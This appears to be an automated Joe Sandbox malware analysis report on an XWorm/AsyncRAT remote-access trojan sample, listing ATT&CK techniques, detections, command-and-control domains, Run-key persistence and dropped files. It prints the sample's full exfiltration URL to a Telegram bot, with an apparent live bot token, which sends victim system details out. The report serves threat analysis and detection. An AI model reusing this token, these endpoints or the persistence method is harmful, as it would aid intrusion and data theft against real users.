                    Ingress Tool Transfer                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeylogging2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Obfuscated Files or Information                    		Cached Domain Credentials23
                    System Information Discovery                    		VNCGUI Input Capture13
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557207 Sample: yF21ypxRB7.exe Startdate: 17/11/2024 Architecture: WINDOWS Score: 100 25 api.telegram.org 2->25 27 perfect-invest.gl.at.ply.gg 2->27 29 time.windows.com 2->29 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 43 15 other signatures 2->43 8 yF21ypxRB7.exe 15 6 2->8         started        13 svchost.exe 1 2->13         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 41 Uses the Telegram API (likely for C&C communication) 25->41 process4 dnsIp5 31 perfect-invest.gl.at.ply.gg 147.185.221.23, 49700, 49725, 49786 SALSGIVERUS United States 8->31 33 api.telegram.org 149.154.167.220, 443, 49699 TELEGRAMRU United Kingdom 8->33 23 C:\Users\user\AppData\Roaming\svchost.exe, PE32 8->23 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->45 47 Drops PE files with benign system names 8->47 49 Antivirus detection for dropped file 13->49 51 Multi AV Scanner detection for dropped file 13->51 53 Machine Learning detection for dropped file 13->53 55 Changes security center settings (notifications, updates, antivirus, firewall) 15->55 19 MpCmdRun.exe 2 15->19         started        file6 signatures7 process8 process9 21 conhost.exe 19->21         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    yF21ypxRB7.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    yF21ypxRB7.exe100%AviraTR/Spy.Gen
                    yF21ypxRB7.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\svchost.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\svchost.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    perfect-invest.gl.at.ply.gg100%Avira URL Cloudmalware
                    http://www.bingmapsportal.comsv0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    perfect-invest.gl.at.ply.gg
                    		147.185.221.23
                    		truetrue
                      		unknown
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        time.windows.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                            		high
                            perfect-invest.gl.at.ply.ggtrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/botyF21ypxRB7.exe, svchost.exe.0.drfalse
                                  		high
                                  https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000002.00000002.1366782396.0000027E79877000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365876022.0000027E79875000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000002.00000003.1264330890.0000027E79836000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dynamic.tsvchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366061020.0000027E7985D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.bingmapsportal.comsvsvchost.exe, 00000002.00000002.1366625213.0000027E79813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameyF21ypxRB7.exe, 00000000.00000002.3701617400.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                149.154.167.220
                                                                                                		api.telegram.orgUnited Kingdom
                                                                                                		62041TELEGRAMRUfalse
                                                                                                147.185.221.23
                                                                                                		perfect-invest.gl.at.ply.ggUnited States
                                                                                                		12087SALSGIVERUStrue

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1557207
                                                                                                Start date and time:2024-11-17 19:23:10 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 7m 53s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:13
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Sample name:yF21ypxRB7.exe
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@11/5@3/2
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 33.3%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 97%
                                                                                                • Number of executed functions: 20
                                                                                                • Number of non-executed functions: 1
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 20.101.57.9
                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7584 because it is empty
                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7788 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • VT rate limit hit for: yF21ypxRB7.exe

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                13:24:11API Interceptor15271065x Sleep call for process: yF21ypxRB7.exe modified
                                                                                                15:22:24API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                19:24:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                19:24:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                19:24:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                149.154.167.220PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          https://t.ly/-kxCOGet hashmaliciousBraodoBrowse
                                                                                                            dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                CloudServices_Slayed.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  CloudServices.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                    147.185.221.239GlCWW6bXc.exeGet hashmaliciousXWormBrowse
                                                                                                                      fiPZoO6xvJ.exeGet hashmaliciousXWormBrowse
                                                                                                                        EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                                                                                          eternal.exeGet hashmaliciousXWormBrowse
                                                                                                                            svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                                              msedge_visual_render.exeGet hashmaliciousXWormBrowse
                                                                                                                                exe030.exeGet hashmaliciousXWormBrowse
                                                                                                                                  pQm8Ci3Dov.exeGet hashmaliciousXWormBrowse
                                                                                                                                    jkL96SLfWS.exeGet hashmaliciousXWormBrowse
                                                                                                                                      xtrSvgqQEW.exeGet hashmaliciousXWormBrowse

                                                                                                                                        Domains

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        api.telegram.orgPayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        CloudServices_Slayed.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        CloudServices.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220

                                                                                                                                        ASNs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        TELEGRAMRUPayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        https://t.ly/-kxCOGet hashmaliciousBraodoBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        CloudServices_Slayed.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        CloudServices.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        SALSGIVERUSOXhiMvksgM.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.22
                                                                                                                                        9GlCWW6bXc.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        fiPZoO6xvJ.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        eternal.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        msedge_visual_render.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        exe030.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        pQm8Ci3Dov.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.23
                                                                                                                                        jkL96SLfWS.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • 147.185.221.23

                                                                                                                                        JA3 Fingerprints

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        1Eo0gOdDsV.exeGet hashmaliciousQuasarBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        4c9ebxnhQk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 149.154.167.220

                                                                                                                                        Dropped Files

                                                                                                                                        No context

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                        File Type:CSV text
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):654
                                                                                                                                        Entropy (8bit):5.380476433908377
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                        C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\yF21ypxRB7.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):41
                                                                                                                                        Entropy (8bit):3.7195394315431693
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                                                                        MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                                                                        SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                                                                        SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                                                                        SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

